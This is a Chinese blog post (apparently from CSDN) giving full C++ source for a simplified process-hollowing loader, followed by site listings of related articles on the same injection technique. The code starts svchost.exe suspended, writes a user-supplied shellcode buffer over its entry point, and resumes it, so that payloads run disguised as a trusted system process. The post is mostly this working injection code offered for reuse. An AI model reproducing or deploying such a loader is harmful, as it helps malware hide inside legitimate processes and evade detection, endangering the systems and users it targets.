创建傀儡进程代码

最新推荐文章于 2024-07-03 15:46:58 发布
最新推荐文章于 2024-07-03 15:46:58 发布
阅读量2k 收藏 7
点赞数 3
分类专栏: 心情杂货铺 文章标签: ProcessHollow 进程注入 傀儡进程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cssxn/article/details/97645162
版权

相比传统的创建傀儡进程的方法,更简单粗暴一些,不用卸载目标进程空间内存。直接利用现有内存进行覆盖写入即可。
减少了一些步骤。

具体步骤:

1.挂起模式创建svchost.exe
2.获取进程入口点
3.将shellcode写到入口点
4.恢复线程执行

#include "stdafx.h"
#include <windows.h>
#include <Winternl.h>
#include "common.h"
#include <iostream>
using namespace std;

unsigned char buf[] = " 替换成你的shellcode";


int _tmain(int argc, _TCHAR* argv[])
{

    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(STARTUPINFOA);
    // 创建挂起进程
    if (!CreateProcessA(
        "c:\\windows\\sysWoW64\\svchost.exe",
        NULL,
        NULL,
        NULL,
        FALSE,
        CREATE_SUSPENDED,
        NULL,
        NULL,
        &si,
        &pi
        ))
    {
        printf("CreateProcess failed (%d).\n", GetLastError());
        return 0;
    }

    // 获取线程上下文
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_ALL;
    if (!GetThreadContext(pi.hThread, &ctx))
    {
        printf("GetThreadContext failed (%d).\n", GetLastError());
    }

    // 拿到目标进程主线程上下文后,在Ebx寄存器中保存的就是PEB的地址,
    // 而PEB结构偏移0x8的位置是AddressOfImageBase字段,
    // 所以直接来读取ctx.Ebx+0x8,就可以获取到目标进程的加载基址
    DWORD dwImageBase = 0;
    DWORD lpNumberOfBytesRead = 0;
    if (!ReadProcessMemory(pi.hProcess, (LPCVOID)(ctx.Ebx + 0x8), &dwImageBase, sizeof(DWORD), &lpNumberOfBytesRead))
    {
        printf("ReadProcessMemory failed (%d).\n", GetLastError());
        return 0;
    }


    // 在申请的空间中写入shellcode
    DWORD NumberOfBytesWritten = 0;
    if (!WriteProcessMemory(pi.hProcess, (LPVOID)ctx.Eax, buf, sizeof(buf), &NumberOfBytesWritten))
    {
        printf("WriteProcessMemory failed (%d).\n", GetLastError());
    }


    // 恢复线程执行
    if (ResumeThread(pi.hThread) == -1)
    {
        printf("ResumeThread failed (%d).\n", GetLastError());
    }

	return 0;
}

在这里插入图片描述

FFE4
关注
专栏目录
傀儡进程 插入
tony的专栏
10-25 1292
BOOL InjectProcess(LPTSTR VictimFile,LPTSTR InjectExe) { HANDLE hFile; DWORD dwFileSize; //文件大小 IMAGE_DOS_HEADER DosHeader; IMAGE_NT_HEADERS NtHeader; PROCESS_INFORMATION pi; STARTUPINFO si;
傀儡进程注入
qq_40710190的博客
05-08 1017
傀儡进程注入 这个注入之所以叫傀儡进程注入是因为其做法是先创建一个A进程,然后将其内存替换成要执行的代码,而从外部来看就是最初创建的A进程。 从我的视角来看跟PE文件注入还蛮像的,不同点在于PE文件注入是将代码注入进去后修改EntryPoint引导至注入代码,而傀儡进程注入则更加简单暴力一些😋,把所有内存替换了。 多亏了之前的一些PE基础因此没有特别费劲PE文件头格式解析 本章详细讲解m0n0ph1的源码 创建傀儡进程 根据一开始所说,我们需要创建一个进程 printf("Creating process
Windows傀儡进程实现C++代码
04-28
Windows平台傀儡进程实现,采用C++, vs2008实现,完美实现
VC下提前注入进程的一些方法2——远线程参数
方亮的专栏
04-17 3647
        在前一节中介绍了通过远线程不参数的方式提前注入进程,现在介绍种远线程携参数的方法。(转载请指明出处)   1.2 执行注入进程需要传信息给被注入进程          因为同样采用的是远线程注入,所以大致的思路是一样的,只是在细节上要注意一些处理。总体来说分为以下几个步骤:         1 将需要传递的信息写入被注入进程的地址空间。         2 将远线程函...
【Linux进程】僵尸进程与孤儿进程
最新发布
2202_75605090的博客
07-03 676
进程先退出,子进程就称之为“孤儿进程”父进程先退出,?那么子进程退出时不就没有进程来读取子进程的PCB退出信息了吗?孤儿进程被1号init进程(OS)领养孤儿进程是为了避免父进程退出, 造成子进程无法被读取, 导致子进程变成僵尸进程的情况;僵尸进程对于服务器服务来说危害极大, 在编写服务时要特别注意;
代码注入傀儡进程
sevenpic的专栏
09-13 1997
 傀儡进程——Exe注入2009-09-17 16:29#include "stdafx.h"#include typedef long NTSTATUS;typedef NTSTATUS (__stdcall *pfnZwUnmapViewOfSection)(        IN HANDLE ProcessHandle,        IN LPVOID BaseAddress        );BOOL CreateIEProcess();PROCESS_INFORMATION pi  = {0};
进程注入创建傀儡进程
yeanhoo的博客
10-19 1794
傀儡进程创建一个进程,然后将其虚拟地址里的内容掏空,注入想要注入进程,以达到掩人耳目的效果 步骤: 1.以挂起的方式创建一个进程 2.卸载该进程的内存映射,即掏空该进程虚拟内存空间中的内容 3.获取该进程的CONTEXT上下文结构 4.将要注入的程序读入到内存中 5.在傀儡进程中申请足够的内存空间 6.手动将要注入的程序写入傀儡进程中所申请的内存空间 6.设置CONTEXT上下文的Eax为程序...
直接将自身代码注入傀儡进程
sevenpic的专栏
09-13 7658
<br />EXE注入-傀儡进程2008-08-16 16:38<br />      直接将自身代码注入傀儡进程,不需要DLL。首先用CreateProcess创建一个挂起的IE进程创建时候就把它挂起。然后得到它的装载基址,使用函数ZwUnmapViewOfSection来卸载这个这个基址内存空间的数据,。再用VirtualAllocEx来个ie进程重新分配内存空间,大小为要注入程序的大小(就是自身的imagesize)。使用WriteProcessMemory重新写IE进程的基址,就是刚才分配的内存
傀儡进程
苞米地里捉小鸡的博客
10-13 657
背景 傀儡进程本质上是借用正常的软件进程或是系统进程的外壳来执行非正常的恶意操作。 函数介绍 1.GetThreadContext 获取指定线程的上下文 2.SetThreadContext 设置指定线程的上下文 3.ResumeThread 减少线程的暂停计数。当暂停计数递减到零时,恢复线程的执行 实现原理 (1)第一步 利用CreateProcess创建进程并且使用CREATE_SUSPENDED标志挂起主线程 bRet = ::CreateProcess(pszFilePat
dll注入系列——傀儡进程
40KO的博客
04-11 1033
0x0介绍 之前说过,要动态注入dll文件,则需要执行程序中本身没有的加载操作,必须改变控制流,除了创建线程外,还可以劫持控制流。这与二进制漏洞利用比较类似,我们向程序写入一段shellcode,然后改变线程上下文,让其去执行shellcode,这段shellcode完成LoadLibrary的操作,就完成了dll注入傀儡进程的本质是利用其他进程空间来执行我们的写入代码,它的实现并不困难...
易语言-可被Svchost.exe启动的DLL服务源码 支持32/64位全系统
06-25
大家都知道,windows系统下有多个svchost.exe进程,它是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。 本源码是一个完整的可被svchost.exe启动的DLL服务源码,同时包含了穿透Session0隔离来与桌面交互的源码(在Vista以上,如果你想在服务程序中创建窗体,目前是不可能直接显示到你的桌面的,而且在服务中是无法访问桌面任何窗口句柄的,因为服务和你使用的桌面不是同一个桌面,而是隔离开的)。 如上图所示,此源码用黑月编译的dll文件,在xp、server2003、win7x64、win10x64(管理员权限运行)测试通过,XP以上的系统应该全支持。但并不一定要黑月编译,静态编译也可以的。这个可以用来做什么?毕竟是系统服务,在开机的时候就运行了,不必登录到系统,具体能做什么大家发挥想象力...
隐藏真实路径和进程名 你懂得
01-12
它能够帮助用户创建一个傀儡文件,这个傀儡文件在运行时会隐藏实际可执行文件的真实路径和进程名,从而增加了程序的隐蔽性。 首先,让我们了解一下什么是进程路径和进程名。在操作系统中,每个运行的程序都对应一个...
另类傀儡进程——利用内存映射文件与APC注入实现
qq_41861225的博客
02-25 903
**前言:**近日分析某游戏辅助软件时,发现其使用了傀儡进程的方式,本以为是常见的傀儡进程技术实现,但在分析时并未发现其调用常规函数实现,而是使用了一些内存映射的API,所以仔细分析后发现其傀儡进程的实现技术有所不同,故学习整理。 一、 傀儡进程 傀儡进程是指将目标进程的映射文件替换为指定的映射文件,替换后的进程称之为傀儡进程。 一般来说傀儡进程创建流程分别为以下几点: 以挂起的方式进行创建...
[Rootkit] 傀儡进程
墨鱼菜鸡
08-16 163
实现原理: 以挂起的方式打开目标进程,将ShellCode代码写入目标进程,并修改目标进程的执行流程,使其转而执行ShellCode代码,这样,进程还是目标原本进程,但执行的操作却替换成我们的ShellCode了。 ...
傀儡进程学习
0xDQ的博客
10-05 4362
0x00 前言 最近做了一道18年swpuctf的题,分析了一个病毒,正巧都用到了傀儡进程,就想着把傀儡进程学习一下。本文权当个人的学习总结了一些网上的文章,如有错误,还请路过的大佬斧正。 0x01 SWPUCTF -- GAME 进入main函数 先获取当前目录,再拼上GAME.EXE 进入sub_4011D0 首先寻找资源,做准备工作,进入sub_4012C0 1)检测PE结构 2)CreateProcessA 创建进程 3)GetThreadContext...
傀儡进程技术分析
darcy_123的博客
10-13 1035
前言: 傀儡进程是将目标进程的映射文件替换为指定的映射文件,替换后的进程称之为傀儡进程;常常有恶意程序将隐藏在自己文件内的恶意代码加载进目标进程,而在加载进目标进程之前,会利用ZwUnmpViewOfSection或者NtUnmapViewOfSection进行相关设置 相关技术要点 1.创建挂起进程 系统函数CreateProcessW中参数dwCreation传递CREATE_SUSP...
[病毒分析]远程木马创建傀儡进程分析
热门推荐
网络安全知识分享
08-06 1万+
远程木马创建傀儡进程分析 一、实验目的 该样本具有一定的免杀性,分析该样本都用了什么技术,能达到免杀效果,所以本次实验目的如下: (1)分析该样本运行流程 (2)提取该样本的关键技术,研究免杀原理。 二、实验描述 分析样本,MD5是997CF4517EE348EA771FD05F489C07FE,分析该样本的运行流程,我们需要调试傀儡进程,修复dump出来的傀儡进程,手工脱UPX壳,修复导入表。 三、实验目标 先将样本放到火绒剑里运行一下,了解样本A大概执行流程 dump出的傀儡进程为B程序,修复后
Ramnit感染型病毒创建傀儡进程的方法
weixin_44156885的博客
06-17 527
Ramnit感染型病毒创建傀儡进程的方法 样本信息: MD5: FF5E1F27193CE51EEC318714EF038BEF SHA1: B4FA74A6F4DAB3A7BA702B6C8C129F889DB32CA6 1,查找默认浏览器 如果有默认浏览器则将默认浏览器作为傀儡进程,如果没有则使用IE浏览器 2,HOOK ntdll.ZwWriteVirtualMemory()函数 使用inline hook的方式HOOK ntdll.ZwWriteVirtualMemory()函数 hook之前暂
傀儡sql注入批量扫描工具
11-03
傀儡SQL注入批量扫描工具是一种用于检测和扫描网站是否存在傀儡SQL注入漏洞的软件工具。傀儡SQL注入是一种常见的网络安全漏洞,攻击者可以利用该漏洞来获取数据库中的敏感信息,或者更严重的情况下,完全控制受攻击的网站。 这种工具的工作原理是自动化扫描一系列的URL链接,检查这些链接是否存在傀儡SQL注入漏洞。工具会自动发送有特殊注入代码的请求,以尝试从数据库中获取未经授权的数据。如果网站存在注入漏洞,工具将会提供相应的警报或报告。 使用傀儡SQL注入批量扫描工具的好处是可以快速发现并修复潜在的漏洞。通过自动化扫描,工具可以在短时间内检查大量的URL链接,从而节省了人工扫描的时间和精力。同时,工具还可以提供详细的报告,包括漏洞的类型、位置和可能的危害程度,帮助网站管理员更好地了解漏洞的风险,并采取相应的措施进行修复。 然而,傀儡SQL注入批量扫描工具只是发现漏洞的工具,不能替代人工的安全评估和修复过程。因此,在使用这种工具时,网站管理员仍然需要监测并验证扫描结果,确保没有误报或漏报。此外,修复漏洞也需要采取正确的措施,例如升级软件、过滤输入等,才能有效地防范傀儡SQL注入攻击。 总之,傀儡SQL注入批量扫描工具在网络安全领域发挥着重要的作用,可以帮助网站管理员快速发现和修复潜在的傀儡SQL注入漏洞,从而提高网站的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值